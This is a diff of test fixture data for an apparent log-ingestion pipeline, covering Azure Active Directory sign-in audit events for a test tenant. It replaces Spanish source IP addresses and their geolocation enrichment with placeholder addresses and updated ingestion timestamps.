+ "ingested": "2021-12-09T13:42:12.970332800Z",
+ "original": 
"{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"4345a7b9-9a63-4910-a426-35363201d503\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-06T09:28:00\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"d4f90f07-f5c4-4b36-a81c-6c9bae8660d6\",\"InterSystemsId\":\"a89e9b3b-b394-4ecf-8abc-a3f6aaf9237f\",\"IntraSystemId\":\"bfe22fb6-c763-4972-91a7-5b13d3d51400\",\"ModifiedProperties\":[],\"ObjectId\":\"00000002-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000002-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", "kind": "event", 
@@ -7097,25 +6170,7 @@
 },
 {
 "source": {
- "geo": {
- "continent_name": "Europe",
- "region_iso_code": "ES-B",
- "city_name": "Barcelona",
- "country_iso_code": "ES",
- "country_name": "Spain",
- "region_name": "Barcelona",
- "location": {
- "lon": 2.1611,
- "lat": 41.3891
- }
- },
- "as": {
- "number": 3352,
- "organization": {
- "name": "Telefonica De Espana"
- }
- },
- "ip": "83.57.233.151"
+ "ip": "67.43.156.15"
 },
 "tags": [
 "preserve_original_event"
@@ -7129,7 +6184,7 @@
 "ObjectId": "5f09333a-842c-47da-a157-57da27fcbca5",
 "ResultStatus": "Succeeded",
 "UserKey": "1003200096971F55@testsiem.onmicrosoft.com",
- "ActorIpAddress": "83.57.233.151",
+ "ActorIpAddress": "67.43.156.15",
 "ExtendedProperties": {
 "KeepMeSignedIn": "True",
 "ResultStatusDetail": "Redirect",
@@ -7179,7 +6234,7 @@
 "asr"
 ],
 "ip": [
- "83.57.233.151"
+ "67.43.156.15"
 ]
 },
 "organization": {
@@ -7191,12 +6246,12 @@
 "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"
 },
 "client": {
- "address": "83.57.233.151",
- "ip": "83.57.233.151"
+ "address": "67.43.156.15",
+ "ip": "67.43.156.15"
 },
 "event": {
- "ingested": "2021-06-17T07:32:46.051693700Z",
- "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-09T15:28:52\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"d2ad235b-d73f-4bd8-8aef-6e4909ee1b7c\",\"InterSystemsId\":\"aca3d9a3-792d-4357-87c6-ef50c3215baa\",\"IntraSystemId\":\"f67a1615-4606-4673-b6fb-68f714fa2200\",\"ModifiedProperties\":[],\"ObjectId\":\"5f09333a-842c-47da-a157-57da27fcbca5\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"5f09333a-842c-47da-a157-57da27fcbca5\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}",
+ "ingested": "2021-12-09T13:42:12.970338400Z",
+ "original": 
"{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T15:28:52\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"d2ad235b-d73f-4bd8-8aef-6e4909ee1b7c\",\"InterSystemsId\":\"aca3d9a3-792d-4357-87c6-ef50c3215baa\",\"IntraSystemId\":\"f67a1615-4606-4673-b6fb-68f714fa2200\",\"ModifiedProperties\":[],\"ObjectId\":\"5f09333a-842c-47da-a157-57da27fcbca5\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"5f09333a-842c-47da-a157-57da27fcbca5\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", "kind": "event", 
@@ -7235,25 +6290,7 @@
 },
 {
 "source": {
- "geo": {
- "continent_name": "Europe",
- "region_iso_code": "ES-B",
- "city_name": "Barcelona",
- "country_iso_code": "ES",
- "country_name": "Spain",
- "region_name": "Barcelona",
- "location": {
- "lon": 2.1611,
- "lat": 41.3891
- }
- },
- "as": {
- "number": 3352,
- "organization": {
- "name": "Telefonica De Espana"
- }
- },
- "ip": "83.57.233.151"
+ "ip": "67.43.156.15"
 },
 "tags": [
 "preserve_original_event"
@@ -7267,7 +6304,7 @@
 "ObjectId": "5f09333a-842c-47da-a157-57da27fcbca5",
 "ResultStatus": "Succeeded",
 "UserKey": "1003200096971F55@testsiem.onmicrosoft.com",
- "ActorIpAddress": "83.57.233.151",
+ "ActorIpAddress": "67.43.156.15",
 "ExtendedProperties": {
 "KeepMeSignedIn": "False",
 "ResultStatusDetail": "Redirect",
@@ -7317,7 +6354,7 @@
 "asr"
 ],
 "ip": [
- "83.57.233.151"
+ "67.43.156.15"
 ]
 },
 "organization": {
@@ -7329,12 +6366,12 @@
 "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"
 },
 "client": {
- "address": "83.57.233.151",
- "ip": "83.57.233.151"
+ "address": "67.43.156.15",
+ "ip": "67.43.156.15"
 },
 "event": {
- "ingested": "2021-06-17T07:32:46.051696500Z",
- "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-10T15:13:37\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"8ff18278-32ca-49d1-8658-91e577e0854f\",\"InterSystemsId\":\"ae211253-88cf-4921-9014-2f9beab64fb0\",\"IntraSystemId\":\"ccfec0f3-498b-43b1-a4c0-fb42f0fb5300\",\"ModifiedProperties\":[],\"ObjectId\":\"5f09333a-842c-47da-a157-57da27fcbca5\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"5f09333a-842c-47da-a157-57da27fcbca5\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}",
+ "ingested": "2021-12-09T13:42:12.970344Z",
+ "original": 
"{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:13:37\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"8ff18278-32ca-49d1-8658-91e577e0854f\",\"InterSystemsId\":\"ae211253-88cf-4921-9014-2f9beab64fb0\",\"IntraSystemId\":\"ccfec0f3-498b-43b1-a4c0-fb42f0fb5300\",\"ModifiedProperties\":[],\"ObjectId\":\"5f09333a-842c-47da-a157-57da27fcbca5\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"5f09333a-842c-47da-a157-57da27fcbca5\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", "kind": "event", 
@@ -7373,25 +6410,7 @@
 },
 {
 "source": {
- "geo": {
- "continent_name": "Europe",
- "region_iso_code": "ES-B",
- "city_name": "Barcelona",
- "country_iso_code": "ES",
- "country_name": "Spain",
- "region_name": "Barcelona",
- "location": {
- "lon": 2.1611,
- "lat": 41.3891
- }
- },
- "as": {
- "number": 3352,
- "organization": {
- "name": "Telefonica De Espana"
- }
- },
- "ip": "83.57.233.151"
+ "ip": "67.43.156.15"
 },
 "tags": [
 "preserve_original_event"
@@ -7405,7 +6424,7 @@
 "ObjectId": "00000003-0000-0000-c000-000000000000",
 "ResultStatus": "Succeeded",
 "UserKey": "1003200096971F55@testsiem.onmicrosoft.com",
- "ActorIpAddress": "83.57.233.151",
+ "ActorIpAddress": "67.43.156.15",
 "ExtendedProperties": {
 "KeepMeSignedIn": "True",
 "ResultStatusDetail": "Redirect",
@@ -7455,7 +6474,7 @@
 "asr"
 ],
 "ip": [
- "83.57.233.151"
+ "67.43.156.15"
 ]
 },
 "organization": {
@@ -7467,12 +6486,12 @@
 "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"
 },
 "client": {
- "address": "83.57.233.151",
- "ip": "83.57.233.151"
+ "address": "67.43.156.15",
+ "ip": "67.43.156.15"
 },
 "event": {
- "ingested": "2021-06-17T07:32:46.051699200Z",
- "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-09T15:28:52\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"a3939990-f7b4-4dc5-af4d-42b70a9485ea\",\"InterSystemsId\":\"b3997fcc-6b0e-45b1-b88d-b4ee4a8a7ddc\",\"IntraSystemId\":\"c1ffa732-6576-4f86-9294-44387abc1f00\",\"ModifiedProperties\":[],\"ObjectId\":\"00000003-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000003-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}",
+ "ingested": "2021-12-09T13:42:12.970349600Z",
+ "original": 
"{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T15:28:52\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"a3939990-f7b4-4dc5-af4d-42b70a9485ea\",\"InterSystemsId\":\"b3997fcc-6b0e-45b1-b88d-b4ee4a8a7ddc\",\"IntraSystemId\":\"c1ffa732-6576-4f86-9294-44387abc1f00\",\"ModifiedProperties\":[],\"ObjectId\":\"00000003-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000003-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", "kind": "event", 
@@ -7511,25 +6530,7 @@
 },
 {
 "source": {
- "geo": {
- "continent_name": "Europe",
- "region_iso_code": "ES-B",
- "city_name": "Barcelona",
- "country_iso_code": "ES",
- "country_name": "Spain",
- "region_name": "Barcelona",
- "location": {
- "lon": 2.1611,
- "lat": 41.3891
- }
- },
- "as": {
- "number": 3352,
- "organization": {
- "name": "Telefonica De Espana"
- }
- },
- "ip": "83.57.233.151"
+ "ip": "67.43.156.15"
 },
 "tags": [
 "preserve_original_event"
@@ -7543,7 +6544,7 @@
 "ObjectId": "00000002-0000-0000-c000-000000000000",
 "ResultStatus": "Succeeded",
 "UserKey": "1003200096971F55@testsiem.onmicrosoft.com",
- "ActorIpAddress": "83.57.233.151",
+ "ActorIpAddress": "67.43.156.15",
 "ExtendedProperties": {
 "KeepMeSignedIn": "False",
 "ResultStatusDetail": "Success",
@@ -7593,7 +6594,7 @@
 "asr"
 ],
 "ip": [
- "83.57.233.151"
+ "67.43.156.15"
 ]
 },
 "organization": {
@@ -7605,12 +6606,12 @@
 "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"
 },
 "client": {
- "address": "83.57.233.151",
- "ip": "83.57.233.151"
+ "address": "67.43.156.15",
+ "ip": "67.43.156.15"
 },
 "event": {
- "ingested": "2021-06-17T07:32:46.051702Z",
- "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"ApplicationId\":\"4345a7b9-9a63-4910-a426-35363201d503\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-10T15:13:01\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"61ba70f4-bd75-4bc2-a681-2e219d920e63\",\"InterSystemsId\":\"b3ab6d58-7b90-45d6-95e3-ee11333ebc34\",\"IntraSystemId\":\"d949d6c2-472e-4901-bd70-96cb90424c00\",\"ModifiedProperties\":[],\"ObjectId\":\"00000002-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000002-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}",
+ "ingested": "2021-12-09T13:42:12.970355100Z",
+ "original": 
"{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"4345a7b9-9a63-4910-a426-35363201d503\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:13:01\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"61ba70f4-bd75-4bc2-a681-2e219d920e63\",\"InterSystemsId\":\"b3ab6d58-7b90-45d6-95e3-ee11333ebc34\",\"IntraSystemId\":\"d949d6c2-472e-4901-bd70-96cb90424c00\",\"ModifiedProperties\":[],\"ObjectId\":\"00000002-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000002-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", "kind": "event", 
@@ -7649,25 +6650,7 @@
 },
 {
 "source": {
- "geo": {
- "continent_name": "Europe",
- "region_iso_code": "ES-B",
- "city_name": "Barcelona",
- "country_iso_code": "ES",
- "country_name": "Spain",
- "region_name": "Barcelona",
- "location": {
- "lon": 2.1611,
- "lat": 41.3891
- }
- },
- "as": {
- "number": 3352,
- "organization": {
- "name": "Telefonica De Espana"
- }
- },
- "ip": "79.159.10.151"
+ "ip": "67.43.156.13"
 },
 "tags": [
 "preserve_original_event"
@@ -7681,7 +6664,7 @@
 "ObjectId": "00000002-0000-0000-c000-000000000000",
 "ResultStatus": "Succeeded",
 "UserKey": "1003200096971F55@testsiem.onmicrosoft.com",
- "ActorIpAddress": "79.159.10.151",
+ "ActorIpAddress": "67.43.156.13",
 "ExtendedProperties": {
 "KeepMeSignedIn": "False",
 "ResultStatusDetail": "Success",
@@ -7731,7 +6714,7 @@
 "asr"
 ],
 "ip": [
- "79.159.10.151"
+ "67.43.156.13"
 ]
 },
 "organization": {
@@ -7743,12 +6726,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "79.159.10.151", - "ip": "79.159.10.151" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-17T07:32:46.051704600Z", - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"79.159.10.151\",\"ApplicationId\":\"80ccca67-54bd-44ab-8625-4b79c4dc7775\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"79.159.10.151\",\"CreationTime\":\"2020-02-12T10:53:12\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"3e17bf8e-92de-45b6-b668-7618ab0e0c95\",\"InterSystemsId\":\"b5c5fd00-b659-413e-8739-6271a4d70506\",\"IntraSystemId\":\"fabbe34e-a6dd-46f8-805f-4ca633c2ae00\",\"ModifiedProperties\":[],\"ObjectId\":\"00000002-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000002-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:42:12.970360700Z", + "original": 
"{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.13\",\"ApplicationId\":\"80ccca67-54bd-44ab-8625-4b79c4dc7775\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.13\",\"CreationTime\":\"2020-02-12T10:53:12\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"3e17bf8e-92de-45b6-b668-7618ab0e0c95\",\"InterSystemsId\":\"b5c5fd00-b659-413e-8739-6271a4d70506\",\"IntraSystemId\":\"fabbe34e-a6dd-46f8-805f-4ca633c2ae00\",\"ModifiedProperties\":[],\"ObjectId\":\"00000002-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000002-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", "kind": "event", 
@@ -7787,25 +6770,7 @@
 },
 {
 "source": {
- "geo": {
- "continent_name": "Europe",
- "region_iso_code": "ES-B",
- "city_name": "Barcelona",
- "country_iso_code": "ES",
- "country_name": "Spain",
- "region_name": "Barcelona",
- "location": {
- "lon": 2.1611,
- "lat": 41.3891
- }
- },
- "as": {
- "number": 3352,
- "organization": {
- "name": "Telefonica De Espana"
- }
- },
- "ip": "79.159.10.151"
+ "ip": "67.43.156.13"
 },
 "tags": [
 "preserve_original_event"
